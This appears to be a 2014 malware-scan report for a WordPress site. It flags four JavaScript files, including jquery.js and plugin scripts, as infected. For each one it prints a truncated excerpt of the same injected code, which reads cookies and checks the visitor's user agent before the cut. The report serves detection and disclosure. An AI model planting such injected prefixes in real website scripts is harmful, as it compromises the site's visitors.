Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hanssen.nl
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hanssen.nl/ | 200 OK Content-Length: 295655 Content-Type: text/html | clean |
http://www.hanssen.nl/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97457 Content-Type: application/javascript | malicious |
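Malicious code - confirmed by antiviruses (see below). Note: the scanner cuts the excerpt off after `var t`, so only the start of the injected script is shown. The visible part defines a cookie reader and a case-insensitive substring check of navigator.userAgent against a fixed list; what the script does with that result is not shown. The same prefix appears verbatim in each file flagged on this page, which is consistent with code prepended to otherwise legitimate scripts. Excerpt: function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.noConflict(); Antivirus reports: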
| ||
http://www.hanssen.nl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8254 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.hanssen.nl/wp-content/plugins/bolcom-partnerprogramma-wordpress-plugin/resources/js/bol-partner-frontend.js?ver=3.9.2 | 200 OK Content-Length: 3679 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/LayerSlider/js/layerslider.kreaturamedia.jquery.js?ver=4.6.3 | 200 OK Content-Length: 49777 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.hanssen.nl/wp-content/plugins/LayerSlider/js/jquery-easing-1.3.js?ver=1.3.0 | 200 OK Content-Length: 9207 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/LayerSlider/js/jquerytransit.js?ver=0.9.9 | 200 OK Content-Length: 7885 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/LayerSlider/js/layerslider.transitions.js?ver=4.6.3 | 200 OK Content-Length: 22079 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/cardoza-facebook-like-box/cardozafacebook.js?ver=3.9.2 | 200 OK Content-Length: 1932 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery('#height_help').toggle(); }) jQuery('#cfbcolor_scheme').click(function(){ jQuery('#color_scheme_help').toggle(); }) jQuery('#cfbshow_faces').click(function(){ jQuery('#show_faces_help').toggle(); }) jQuery('#cfbstream').click(function(){ jQuery('#stream_help').toggle(); }) jQuery('#cfbheader').click(function(){ jQuery('#header_help').toggle(); }) }) Antivirus reports:
| ||
http://www.hanssen.nl//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 11:09:44 GMT Pragma: no-cache Location: http://www.hanssen.nl/translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=6ead7a0ba21efab2c0ca5955737fec42; path=/ X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.hanssen.nl/translate.google.com/translate_a/element.js?cb=googletranslateelementinit/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 11:09:44 GMT Pragma: no-cache Location: http://www.hanssen.nl Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=c0e9c3bc82aa1fafad7bddfc0a5344a5; path=/ X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.hanssen.nl/test404page.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 05 Oct 2014 11:09:45 GMT Pragma: no-cache Location: http://www.hanssen.nl Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=fbe54c27743b992cd30e218118554240; path=/ X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.hanssen.nl/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 16303 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.1 | 200 OK Content-Length: 10713 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/themes/daisho/modules/module-info-box/info-box.js?ver=3.9.2 | 200 OK Content-Length: 1543 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/themes/daisho/modules/shortcode-content-slider/content-slider.js?ver=3.9.2 | 200 OK Content-Length: 4901 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/themes/daisho/modules/shortcode-gmap/jquery.gmap.min.js?ver=3.9.2 | 200 OK Content-Length: 4890 Content-Type: application/javascript | clean |
http://www.hanssen.nl/wp-content/themes/daisho/modules/shortcode-gmap/gmap.js?ver=3.9.2 | 200 OK Content-Length: 1775 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hanssen.nl
Result:
GET / HTTP/1.1
Host: hanssen.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hanssen.nl
Referer: http://www.google.com/search?q=hanssen.nl
Result:
The result is similar to the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: hanssen.nl
Referer: http://www.google.com/search?q=hanssen.nl
Result:
The result is similar to the first query. No suspicious redirects were found.